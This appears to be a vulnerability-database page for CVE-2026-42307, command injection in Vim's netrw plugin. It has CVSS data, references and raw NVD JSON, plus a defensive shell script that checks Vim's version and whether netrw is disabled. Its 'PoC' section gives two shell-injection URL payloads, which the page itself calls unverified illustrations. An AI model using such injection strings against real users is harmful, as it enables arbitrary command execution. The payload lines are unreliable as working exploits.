Security Vulnerability Report
CVE-2026-42307 CVSS 4.4 MEDIUM

Published: 2026-05-08 23:16:37
Last Modified: 2026-05-08 23:16:37

Description

Vim is an open source, command line text editor. Prior to version 9.2.0383, an OS command injection vulnerability exists in the netrw standard plugin bundled with Vim. By inducing a user to open a crafted URL (e.g., using the sftp:// or file:// protocol handlers), an attacker can execute arbitrary shell commands with the privileges of the Vim process. This issue has been patched in version 9.2.0383.

CVSS Details

CVSS Score
4.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No NVD configuration (CPE) data is available yet; the record's status is "Received". Affected range per the advisory description:

Vim < 9.2.0383 (fixed in 9.2.0383)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
shell
# Exploit PoC for CVE-2026-42307
# Description: Trigger command injection via a crafted netrw URL.
# Usage: Open the crafted URL with Vim from the command line, or enter it as an Ex command inside Vim.

# Method 1: Command line invocation
vim 'sftp://;touch /tmp/vim_pwned;'

# Method 2: Inside Vim (on the Ex command line)
:e sftp://$(id)

# Note: The exact payload syntax depends on the specific flaw in netrw's URL handling,
# which this page does not detail. The lines above illustrate the concept of injecting
# shell commands through the protocol handler; they are not a verified working exploit.
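The following POSIX shell script is an added worked example, not code from the advisory, from NVD, or from the Vim project. It answers the two questions a practitioner has after reading the description above: is the Vim on this host older than the fix in 9.2.0383, and has netrw been disabled in the meantime. It assumes the format Vim prints for `vim --version` (a first line "VIM - Vi IMproved X.Y (...)" and a line "Included patches: 1-N", where the last number is the highest patch applied) and that "9.2.0383" means major.minor 9.2 with patch 383 included. The sample version outputs and the sample vimrc are constructed for offline use, not captured from real systems. The setting `let g:loaded_netrwPlugin = 1` is the standard netrw no-load switch from Vim's netrw help (`:help netrw-noload`); it removes the sftp://, file:// and other netrw URL handlers entirely and is an interim mitigation, not a substitute for upgrading.

```sh
#!/bin/sh
# Added example (not from the advisory or the Vim project): decide whether a
# Vim build predates the netrw fix in 9.2.0383 by parsing `vim --version`
# output, and check whether a vimrc disables netrw as an interim mitigation.
#
# Assumed `vim --version` format (not stated by the advisory):
#   "VIM - Vi IMproved X.Y (...)"  on the first line
#   "Included patches: 1-N"        later, possibly comma-separated ranges;
#                                  the last number is the highest patch.

FIXED_MAJOR=9
FIXED_MINOR=2
FIXED_PATCH=383

# vim_has_fix TEXT: TEXT is the output of `vim --version`.
# Returns 0 if the build is at or after 9.2.0383, 1 if it is older
# (still vulnerable), 2 if the version line could not be parsed.
vim_has_fix() {
    text=$1
    mm=$(printf '%s\n' "$text" \
        | sed -n 's/^VIM - Vi IMproved \([0-9][0-9]*\)\.\([0-9][0-9]*\).*/\1 \2/p' \
        | head -n 1)
    [ -n "$mm" ] || return 2
    major=${mm%% *}
    minor=${mm##* }
    patch=$(printf '%s\n' "$text" \
        | sed -n 's/^Included patches:.*[-, ]\([0-9][0-9]*\)[[:space:]]*$/\1/p' \
        | head -n 1)
    patch=${patch:-0}   # no "Included patches" line means patch level 0

    [ "$major" -gt "$FIXED_MAJOR" ] && return 0
    [ "$major" -lt "$FIXED_MAJOR" ] && return 1
    [ "$minor" -gt "$FIXED_MINOR" ] && return 0
    [ "$minor" -lt "$FIXED_MINOR" ] && return 1
    [ "$patch" -ge "$FIXED_PATCH" ]
}

# netrw_disabled TEXT: returns 0 if vimrc TEXT contains an uncommented
# `let g:loaded_netrwPlugin = 1`, the documented way to keep netrw from loading.
netrw_disabled() {
    printf '%s\n' "$1" \
        | grep -Eq '^[[:space:]]*let[[:space:]]+g:loaded_netrwPlugin[[:space:]]*=[[:space:]]*1([[:space:]]|$)'
}

# report LABEL TEXT: print a one-line verdict for a `vim --version` TEXT.
report() {
    rc=0
    vim_has_fix "$2" || rc=$?
    case $rc in
        0) printf '%s: fixed (>= 9.2.0383)\n' "$1" ;;
        1) printf '%s: VULNERABLE to CVE-2026-42307 (< 9.2.0383)\n' "$1" ;;
        *) printf '%s: could not parse version output\n' "$1" ;;
    esac
}

# Constructed sample outputs (not captured from real systems).
OLD_PATCHED='VIM - Vi IMproved 9.2 (2026 Mar 01, compiled Mar 02 2026 09:00:00)
Included patches: 1-382'
FIXED='VIM - Vi IMproved 9.2 (2026 Mar 01, compiled Apr 10 2026 09:00:00)
Included patches: 1-383'
OLD_MINOR='VIM - Vi IMproved 9.1 (2024 Jan 02, compiled Jan 03 2025 09:00:00)
Included patches: 1-1234'
# Constructed sample vimrc with the interim mitigation applied.
VIMRC_MITIGATED='" disable netrw until the upgrade to 9.2.0383 lands
let g:loaded_netrwPlugin = 1'

report "sample 9.2.0382" "$OLD_PATCHED"
report "sample 9.2.0383" "$FIXED"
report "sample 9.1.1234" "$OLD_MINOR"
if netrw_disabled "$VIMRC_MITIGATED"; then
    printf 'sample vimrc: netrw disabled (g:loaded_netrwPlugin = 1)\n'
fi

# Finally, check the Vim actually on PATH, if there is one.
if command -v vim >/dev/null 2>&1; then
    report "installed vim" "$(vim --version 2>/dev/null)"
fi
```

The version check deliberately compares major.minor before the patch level: a 9.1 build with patch 1234 is still older than 9.2.0383, while a hypothetical 9.3 build with no patches line is already past the fix. Run the script on each host (or feed it `vim --version` output collected by your inventory tooling) and treat a "VULNERABLE" verdict as an upgrade ticket; the vimrc check only confirms that the stopgap is in place.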

References

https://github.com/vim/vim/security/advisories/GHSA-85ch-p2qr-m5gx (GitHub security advisory)
https://github.com/vim/vim/commit/405e2fb6d54d5653523809e2853d99d1c000a5fc (fix commit)
https://github.com/vim/vim/releases/tag/v9.2.0383 (release containing the fix)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-42307",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-08T23:16:36.777",
    "lastModified": "2026-05-08T23:16:36.777",
    "vulnStatus": "Received",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Vim is an open source, command line text editor. Prior to version 9.2.0383, an OS command injection vulnerability exists in the netrw standard plugin bundled with Vim. By inducing a user to open a crafted URL (e.g., using the sftp:// or file:// protocol handlers), an attacker can execute arbitrary shell commands with the privileges of the Vim process. This issue has been patched in version 9.2.0383."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N",
            "baseScore": 4.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.8,
          "impactScore": 2.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-78"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/vim/vim/commit/405e2fb6d54d5653523809e2853d99d1c000a5fc",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/vim/vim/releases/tag/v9.2.0383",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/vim/vim/security/advisories/GHSA-85ch-p2qr-m5gx",
        "source": "[email protected]"
      }
    ]
  }
}